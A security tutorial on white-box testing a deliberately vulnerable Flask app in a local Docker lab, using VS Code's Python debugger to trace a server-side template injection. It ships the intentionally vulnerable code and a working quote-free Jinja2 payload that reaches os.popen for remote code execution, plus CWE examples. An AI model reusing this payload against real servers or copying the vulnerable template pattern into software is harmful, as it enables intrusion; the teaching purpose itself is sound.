White-box penetration testing: Debugging for Python vulnerabilities

September 12, 2024

This article explains how to perform white-box penetration testing on a Python web application running in a Docker container. In this white-box pentest, we will go through how to debug Python in VS Code in order to track our payloads throughout the process, and understand how security filters can hide vulnerabilities in plain sight.

Outline

Necessary resources
Install necessary resources
File structure
Hunt for Python vulnerabilities
Common Python vulnerabilities
Improve future black-box testing with code analysis
Conclusion
References

Necessary resources

Visual Studio Code aka VS Code (or your preferred IDE)
Python Debugger
Docker

Install necessary resources

Once you have installed Visual Studio Code, you can install the Python debugger extension from the extension tab on the left-hand side. Simply search for "Python debugger" and install it:

File structure

Our project will use the following file structure:

.
├── config
│   └── supervisord.conf
├── docker-compose.yml
├── Dockerfile
└── vsnippet
    ├── 6-ssti-classic.py
    ├── ignore
    │   └── design
    │       └── design.py
    └── templates
        └── index.html

Certain files are extra-important and must be added or modified. The files below contain the final file content:

6-ssti-classic.py

This is the vulnerable Python web application that we will run in a dockerised environment.

from flask import Flask, render_template_string, render_template, request
import html
from ignore.design import design
app = design.Design(Flask(__name__), __file__, 'Vsnippet 6 - Server Side Template Injection (SSTI)')

##
# YesWeHack - Vulnerable code snippets
##

def MySQL_Get(table, data):#<-Dummy function
  return False, ""

def searchResult(data):#<-Dummy function
  return ""

def NoItemFound(s):
  tpl = ('''
  <script src="{{ domain }}/main.js"></script>
  <h3 id="search">No result for: %s</h3>
  ''' % s)
  return render_template_string(tpl, domain=request.url_root)

@app.route('/')
def index():
  try:
    #Get the user search value:
    search = html.escape(request.args.get('search'))
  except:
    return render_template('index.html', result="No search provided")

  db_status, db_data = MySQL_Get("products", search)
  if db_status:
    data = searchResult(db_data)
  else:
    data = NoItemFound(search)
  
  #Return content to client:
  return render_template('index.html', result=data)

if __name__ == '__main__':
  app.run(host='0.0.0.0', port=1337)

supervisord.conf

In our supervisord.conf file, the only thing we need to modify is the command setting in the [program:flask] section. We set it to python -m debugpy --listen 0.0.0.0:5678 --wait-for-client /app/6-ssti-classic.py so that the debugger listener starts as soon as the Docker container boots. The --wait-for-client flag holds the script until a debugger attaches.

[supervisord]
user=root
nodaemon=true
logfile=/dev/null
logfile_maxbytes=0
pidfile=/run/supervisord.pid

[program:flask]
command=python -m debugpy --listen 0.0.0.0:5678 --wait-for-client /app/6-ssti-classic.py
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0

launch.json

This will be the configuration used to tell Visual Studio Code how to connect to the Python Debugger running in a Docker container.

{
  "version": "0.2.0",
  "configurations": [
    {
      "name": "Python Debugger: Remote Attach",
      "type": "debugpy",
      "request": "attach",
      "connect": {
          "host": "172.20.0.111",
          "port": 5678
      },
      "pathMappings": [
        {
          "localRoot": "${workspaceFolder}/vsnippet",
          "remoteRoot": "."
        }
      ]
    }
  ]
}

Dockerfile

As well as building the Docker image, the Dockerfile installs and activates our Python debugger inside the Docker container.

FROM python:3

#Install and update system dependencies
RUN apt update -y; apt install -y supervisor
RUN pip install flask debugpy

#Prepare and setup the working directory
RUN mkdir -p /app
WORKDIR /app
COPY vsnippet .
COPY config/supervisord.conf /etc/supervisord.conf

#Disable pycache
ENV PYTHONDONTWRITEBYTECODE=1

CMD [ "/usr/bin/supervisord", "-c", "/etc/supervisord.conf" ]

docker-compose.yml

To this file we will add a network called debug-net. We will then add a static IPv4 address to our Python web application: 172.20.0.111. Finally, we will open Python's debugger port: 5678.

This setup allows us to more effectively connect and communicate with the Python debugger running in the Docker container.

version: '3.8'

services:
  python-flask:
    container_name: ssti-classic-6
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "127.0.0.1:1337:1337"
      - "127.0.0.1:5678:5678"
    networks:
      debug-net:
        ipv4_address: 172.20.0.111

networks:
  debug-net:
    driver: bridge
    ipam:
      config:
        - subnet: 172.20.0.0/24

Verify our setup

To validate that our setup is working properly, we need to start our Docker container, connect to Python Debugger, set up breakpoints in Visual Studio Code and, finally, perform a request to the web application to see if the debugger stops at these breakpoints.

Go to the root folder of the project (see the File structure section) and run the following command:

docker compose up --build

Usually, you want to start this command in the background (using the argument -d), but if you’re unfamiliar with Docker, I recommend running the command as it appears above so that you can see the logs. Once the Docker container has finished the build process and starts, we notice this message from our Python debugger:

This message shows that our Docker container started successfully and that Python’s debugger is now listening for a connection, ready to start debugging.

Now let's set up some breakpoints inside the Python web application code located in Visual Studio Code!

We can set up breakpoints by clicking on the red dot that appears when you hover over the line number.

Inside VS Code, go to the debugger section on the left-side panel (shortcut: CTRL+SHIFT+D). Once inside the debug section, press the green arrow icon located at the top (see image below):

With the debugger in Visual Studio Code up and running and connected to Python's debugger, you should now see in the terminal that the Python web application is running.

The logs should look like this:

Now that our debugger is connected, it's time to send an HTTP request to trigger the Visual Studio Code breakpoints. We can use the command-line interface (CLI) tool cURL to send a GET request to our web application:

curl http://localhost:1337/

If everything goes as expected, you should not get a response immediately. Instead, the request waits while VS Code highlights the line at the first breakpoint, which proves the debugger is working:

Hunt for Python vulnerabilities

Now we know our setup and debugger are working as expected, it's time for the bug hunt.

As you may have already noticed, our web application is vulnerable to a server-side template injection (SSTI) vulnerability. Let’s try an SSTI payload: {{7*'7'}}, which in Python Jinja2 results in 7777777.
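The expected output follows from ordinary Python operator semantics, which Jinja2 expressions mirror for multiplication: an integer times a string repeats the string. The sketch below uses plain Python only (no Jinja2 involved), and the variable names are purely illustrative. The integer case is included for comparison.

```python
# Plain-Python equivalent of the arithmetic inside the probe.
# Jinja2 is not used here; this only illustrates the operator semantics.
string_probe = 7 * '7'   # int * str repeats the string seven times
integer_probe = 7 * 7    # int * int is ordinary multiplication

print(string_probe)   # 7777777
print(integer_probe)  # 49
```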

Next we analyse the request we sent containing our payload in the search GET parameter. In Visual Studio Code, we can see a breakpoint hit:

We then click the blue, triangular arrow at the top (the first arrow from left to right):

Take a close look at the debug side panel on the left: our payload, which was sent in the search GET parameter, is now the value of the search Python variable. You might also notice that the payload has been HTML-escaped, so its single quotes have been replaced by HTML entities. So in theory, if the web application is vulnerable to an SSTI, the template engine will receive a malformed expression and we should get an error.

Let's move to our next breakpoint to see what final input is given to the template engine:

You can see that the template for the domain Python variable looks correct: {{ domain }}. However, our payload, {{7*'7'}}, is HTML-escaped by the Python function html.escape. This makes our payload non-functional.
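What the debugger shows at this breakpoint can be reproduced outside the application. The following is a minimal sketch, assuming the template text from NoItemFound() and the html.escape call from index(). The helper name build_template_source is hypothetical, and the template is never rendered here, only assembled.

```python
import html

# Template text adapted from NoItemFound() in 6-ssti-classic.py.
TEMPLATE = '''
<script src="{{ domain }}/main.js"></script>
<h3 id="search">No result for: %s</h3>
'''

def build_template_source(raw_search):
    """Mimic index() and NoItemFound(): escape the input, then format it in."""
    escaped = html.escape(raw_search)
    return TEMPLATE % escaped

# Print the template source the engine would receive for each payload.
for payload in ("{{7*'7'}}", "{{7*7}}"):
    print(build_template_source(payload))
```

In the first result the quotes appear as &#x27;, which is not something a template expression can parse. The second payload contains none of the characters that html.escape rewrites, so it reaches the template engine unchanged.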

And as predicted, we got a 500 server error in our HTTP response!

To confirm that the vulnerability really exists, we can use the payload {{7*7}}, which contains no quotes, and see how Python reacts this time using VS Code's debugger:

Looking at our debugger result, we can see that everything looks good!

And we get a positive result: 49 appearing in the HTTP response from our vulnerable web application!

Now that we understand how our payload is being escaped and inserted, we can adapt the payload to exploit the web application and achieve a remote code execution (RCE)!

Because our payload is HTML-escaped before it is inserted into the template string, we cannot take advantage of quotes. And without being able to write the command as a pure string, it will be more challenging to provide a system command. Luckily, we have a solution: Read ‘Limitations are just an illusion: Advanced server-side template exploitation with RCE everywhere’ to learn how to achieve RCE without using quotation marks in your payload.

We can access the Python function chr, which converts an integer code point (given here in decimal) to its corresponding character, and use it to build a string without quotes. As an example, we can generate the string id with the following payload:

{{ self.__init__.__globals__.__builtins__.chr(105)+self.__init__.__globals__.__builtins__.chr(100) }}

Values 105 and 100 represent the ASCII characters i and d, resulting in id.
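Writing these chr() chains by hand becomes tedious for longer commands. The sketch below generates them, assuming the same attribute path to chr as in the payload above. The helper to_chr_expression is hypothetical and exists only for illustration.

```python
import html

# Attribute path to chr() taken from the payload above.
CHR_PATH = "self.__init__.__globals__.__builtins__.chr"

def to_chr_expression(text, chr_path=CHR_PATH):
    """Return a quote-free expression that concatenates chr() calls."""
    return "+".join(f"{chr_path}({ord(char)})" for char in text)

expression = to_chr_expression("id")
print(expression)

# Sanity checks: the code points decode to "id", and the expression
# contains nothing that html.escape would rewrite.
print("".join(chr(code) for code in (105, 100)))  # id
print(html.escape(expression) == expression)      # True
```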

Then we can use this string as our argument in Python's os.popen function, which will execute our system command and give us RCE:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__builtins__.chr(105)+self.__init__.__globals__.__builtins__.chr(100)).read() }}

This results in a successful remote code execution on our web application!

Common Python vulnerabilities

Below are three weaknesses commonly found in Python applications.

CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Although prototype pollution vulnerabilities mainly affect the JavaScript programming language, Python can contain flaws that fall into this category, namely “class pollution” vulnerabilities.
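To make the idea concrete, here is a minimal sketch of class pollution. The User class, the merge function and the untrusted dictionary are all hypothetical, and a real application would usually reach such a merge through parsed JSON input.

```python
class User:
    role = "guest"  # class-level default shared by every instance

    def __init__(self, name):
        self.name = name

def merge(source, destination):
    """Naive recursive merge that follows any attribute name, dunders included."""
    for key, value in source.items():
        if isinstance(value, dict) and hasattr(destination, key):
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)

alice = User("alice")
bob = User("bob")

# Attacker-controlled data, for example parsed from a JSON request body.
untrusted = {"name": "mallory", "__class__": {"role": "admin"}}
merge(untrusted, alice)

print(alice.name)  # mallory
print(bob.role)    # admin
```

Because the merge follows __class__ from the instance to the class itself, an update aimed at one object changes the default for every other instance.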

CWE-1336: Improper Neutralisation of Special Elements Used in a Template Engine

While this vulnerability is not specifically related to Python, it is important to note that most Python template engines are very powerful. Since they typically provide the ability to run pure Python code within the template engine, there’s a particularly significant risk of high-impact vulnerabilities.

CWE-36: Absolute Path Traversal

Any programming language can be vulnerable to this CWE. With Python, absolute path traversal can arise when developers use os.path.join insecurely. This function is often used to join a directory path and a filename, but many developers don’t realise that if a later argument is an absolute path, such as a filename with a leading forward slash (/myfile.txt), os.path.join discards every preceding component and returns that absolute path.

Code example:

import os
filename = "/myfile.txt"
result = os.path.join("/my/path/", filename)
print(result) # Result in: /myfile.txt
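When reviewing code, it helps to know what a containment check around such a join might look like. The following is a rough sketch, not a complete defence: safe_join is a hypothetical helper, posixpath is used so the behaviour is the same on any platform, and symbolic links are not resolved.

```python
import posixpath

def safe_join(base_dir, filename):
    """Join filename onto base_dir and reject results outside base_dir."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, filename))
    # commonpath returns the longest shared parent directory of both paths.
    if posixpath.commonpath([base, candidate]) != base:
        raise ValueError(f"{filename!r} escapes {base!r}")
    return candidate

print(safe_join("/my/path/", "myfile.txt"))  # /my/path/myfile.txt

for bad in ("/myfile.txt", "../../etc/passwd"):
    try:
        safe_join("/my/path/", bad)
    except ValueError as error:
        print("rejected:", error)
```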

Improve future black-box testing with code analysis

As predicted, our first SSTI payload generated an HTTP response containing a 500 server error. By using the debugger, we discovered that the payload failed not because of an error in the payload itself, but because the server HTML-escaped the payload, rendering it invalid.

As a takeaway for future black-box testing, it’s worth testing multiple payloads with various tweaks when trying to detect the same vulnerability. Deploying a wide variety of payloads is a great way of detecting how the back-end server transforms your input and of avoiding false negatives.
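One way to organise such a test is to pair each payload variant with the output it should produce and classify every response. The sketch below assumes this article's lab URL and its search parameter. The probe list, build_probe_url and classify are hypothetical, and sending the requests is left to your HTTP client of choice.

```python
from urllib.parse import urlencode

# Target URL from this article's lab; the probe list is illustrative only.
BASE_URL = "http://localhost:1337/"
PROBES = [
    ("{{7*'7'}}", "7777777"),  # needs quotes, so HTML escaping breaks it
    ("{{7*7}}", "49"),         # no quotes, so it survives HTML escaping
]

def build_probe_url(payload, base_url=BASE_URL):
    """URL-encode the payload into the search GET parameter."""
    return f"{base_url}?{urlencode({'search': payload})}"

def classify(status_code, body, expected):
    """Rough triage of a single response; short markers can match by chance."""
    if expected in body:
        return "evaluated"
    if status_code >= 500:
        return "server error"
    return "no signal"

for payload, expected in PROBES:
    print(build_probe_url(payload), "-> look for", expected)
```

A server error on one variant combined with an evaluated result on another, as seen in this lab, suggests that a filter is altering the input rather than that the injection point is safe.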

Conclusion

Debugging your target’s source code helps you to track executed code triggered by the client (attacker). The process we’ve detailed can optimise your testing flow and surface behaviours that help you identify how user input is being handled.

If the server HTML-encodes your SSTI payload and makes it invalid during execution, it is important to understand how this will affect your future exploitation of the vulnerability. To this end, practising debugging and code analysis on vulnerable targets will teach you how different filters are used and how various programming languages implement protection mechanisms.